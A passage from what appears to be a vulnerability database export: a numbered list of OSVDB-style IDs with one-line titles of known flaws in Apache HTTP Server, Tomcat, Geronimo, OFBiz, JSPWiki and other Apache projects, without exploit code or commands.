11924| [60232] PHP on Apache php.exe Direct Request Remote DoS
11925| [60176] Apache Tomcat Windows Installer Admin Default Password
11926| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
11927| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
11928| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
11929| [59944] Apache Hadoop jobhistory.jsp XSS
11930| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
11931| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
11932| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
11933| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
11934| [59019] Apache mod_python Cookie Salting Weakness
11935| [59018] Apache Harmony Error Message Handling Overflow
11936| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
11937| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
11938| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
11939| [59010] Apache Solr get-file.jsp XSS
11940| [59009] Apache Solr action.jsp XSS
11941| [59008] Apache Solr analysis.jsp XSS
11942| [59007] Apache Solr schema.jsp Multiple Parameter XSS
11943| [59006] Apache Beehive select / checkbox Tag XSS
11944| [59005] Apache Beehive jpfScopeID Global Parameter XSS
11945| [59004] Apache Beehive Error Message XSS
11946| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
11947| [59002] Apache Jetspeed default-page.psml URI XSS
11948| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
11949| [59000] Apache CXF Unsigned Message Policy Bypass
11950| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
11951| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
11952| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
11953| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
11954| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
11955| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
11956| [58993] Apache Hadoop browseBlock.jsp XSS
11957| [58991] Apache Hadoop browseDirectory.jsp XSS
11958| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
11959| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
11960| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
11961| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
11962| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
11963| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
11964| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
11965| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
11966| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
11967| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
11968| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
11969| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
11970| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
11971| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
11972| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
11973| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
11974| [58974] Apache Sling /apps Script User Session Management Access Weakness
11975| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
11976| [58931] Apache Geronimo Cookie Parameters Validation Weakness
11977| [58930] Apache Xalan-C++ XPath Handling Remote DoS
11978| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
11979| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
11980| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
11981| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
11982| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
11983| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
11984| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
11985| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
11986| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
11987| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
11988| [58805] Apache Derby Unauthenticated Database / Admin Access
11989| [58804] Apache Wicket Header Contribution Unspecified Issue
11990| [58803] Apache Wicket Session Fixation
11991| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
11992| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
11993| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
11994| [58799] Apache Tapestry Logging Cleartext Password Disclosure
11995| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
11996| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
11997| [58796] Apache Jetspeed Unsalted Password Storage Weakness
11998| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
11999| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
12000| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
12001| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
12002| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
12003| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
12004| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
12005| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
12006| [58775] Apache JSPWiki preview.jsp action Parameter XSS
12007| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
12008| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
12009| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
12010| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
12011| [58770] Apache JSPWiki Group.jsp group Parameter XSS
12012| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
12013| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
12014| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
12015| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
12016| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
12017| [58763] Apache JSPWiki Include Tag Multiple Script XSS
12018| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
12019| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
12020| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
12021| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
12022| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
12023| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
12024| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
12025| [58755] Apache Harmony DRLVM Non-public Class Member Access
12026| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
12027| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
12028| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
12029| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
12030| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
12031| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
12032| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
12033| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
12034| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
12035| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
12036| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
12037| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
12038| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
12039| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
12040| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
12041| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
12042| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
12043| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
12044| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
12045| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
12046| [58725] Apache Tapestry Basic String ACL Bypass Weakness
12047| [58724] Apache Roller Logout Functionality Failure Session Persistence
12048| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
12049| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
12050| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
12051| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
12052| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
12053| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
12054| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
12055| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
12056| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
12057| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
12058| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
12059| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
12060| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
12061| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
12062| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
12063| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
12064| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
12065| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
12066| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
12067| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
12068| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
12069| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
12070| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
12071| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
12072| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
12073| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
12074| [58687] Apache Axis Invalid wsdl Request XSS
12075| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
12076| [58685] Apache Velocity Template Designer Privileged Code Execution
12077| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
12078| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
12079| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
12080| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
12081| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
12082| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
12083| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
12084| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
12085| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
12086| [58667] Apache Roller Database Cleartext Passwords Disclosure
12087| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
12088| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
12089| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
12090| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
12091| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
12092| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
12093| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
12094| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
12095| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
12096| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
12097| [56984] Apache Xerces2 Java Malformed XML Input DoS
12098| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
12099| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
12100| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
12101| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
12102| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
12103| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
12104| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
12105| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
12106| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
12107| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
12108| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
12109| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
12110| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
12111| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
12112| [55056] Apache Tomcat Cross-application TLD File Manipulation
12113| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
12114| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
12115| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
12116| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
12117| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
12118| [54589] Apache Jserv Nonexistent JSP Request XSS
12119| [54122] Apache Struts s:a / s:url Tag href Element XSS
12120| [54093] Apache ActiveMQ Web Console JMS Message XSS
12121| [53932] Apache Geronimo Multiple Admin Function CSRF
12122| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
12123| [53930] Apache Geronimo /console/portal/ URI XSS
12124| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
12125| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
12126| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
12127| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
12128| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
12129| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
12130| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
12131| [53380] Apache Struts Unspecified XSS
12132| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
12133| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
12134| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
12135| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
12136| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
12137| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
12138| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
12139| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
12140| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
12141| [51151] Apache Roller Search Function q Parameter XSS
12142| [50482] PHP with Apache php_value Order Unspecified Issue
12143| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
12144| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
12145| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
12146| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
12147| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
12148| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
12149| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
12150| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
12151| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
12152| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
12153| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
12154| [47096] Oracle Weblogic Apache Connector POST Request Overflow
12155| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
12156| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
12157| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
12158| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
12159| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
12160| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
12161| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
12162| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
12163| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
12164| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
12165| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
12166| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
12167| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
12168| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
12169| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
12170| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
12171| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
12172| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
12173| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
12174| [43452] Apache Tomcat HTTP Request Smuggling
12175| [43309] Apache Geronimo LoginModule Login Method Bypass
12176| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
12177| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
12178| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
12179| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
12180| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
12181| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
12182| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
12183| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
12184| [42091] Apache Maven Site Plugin Installation Permission Weakness
12185| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
12186| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
12187| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
12188| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
12189| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
12190| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
12191| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
12192| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
12193| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
12194| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
12195| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
12196| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
12197| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
12198| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
12199| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
12200| [40262] Apache HTTP Server mod_status refresh XSS
12201| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
12202| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
12203| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
12204| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
12205| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
12206| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
12207| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
12208| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
12209| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
12210| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
12211| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
12212| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
12213| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
12214| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
12215| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
12216| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
12217| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
12218| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
12219| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
12220| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
12221| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
12222| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
12223| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
12224| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
12225| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
12226| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
12227| [36080] Apache Tomcat JSP Examples Crafted URI XSS
12228| [36079] Apache Tomcat Manager Uploaded Filename XSS
12229| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
12230| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
12231| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
12232| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
12233| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
12234| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
12235| [34881] Apache Tomcat Malformed Accept-Language Header XSS
12236| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
12237| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
12238| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
12239| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
12240| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
12241| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
12242| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
12243| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
12244| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
12245| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
12246| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
12247| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
12248| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
12249| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
12250| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
12251| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
12252| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
12253| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
12254| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
12255| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
12256| [32724] Apache mod_python _filter_read Freed Memory Disclosure
12257| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
12258| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
12259| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
12260| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
12261| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
12262| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
12263| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
12264| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
12265| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
12266| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
12267| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
12268| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
12269| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
12270| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
12271| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
12272| [24365] Apache Struts Multiple Function Error Message XSS
12273| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
12274| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
12275| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
12276| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
12277| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
12278| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
12279| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
12280| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
12281| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
12282| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
12283| [22459] Apache Geronimo Error Page XSS
12284| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
12285| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
12286| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
12287| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
12288| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
12289| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
12290| [21021] Apache Struts Error Message XSS
12291| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
12292| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
12293| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
12294| [20439] Apache Tomcat Directory Listing Saturation DoS
12295| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
12296| [20285] Apache HTTP Server Log File Control Character Injection
12297| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
12298| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
12299| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
12300| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
12301| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
12302| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
12303| [19821] Apache Tomcat Malformed Post Request Information Disclosure
12304| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
12305| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
12306| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
12307| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
12308| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
12309| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
12310| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
12311| [18233] Apache HTTP Server htdigest user Variable Overfow
12312| [17738] Apache HTTP Server HTTP Request Smuggling
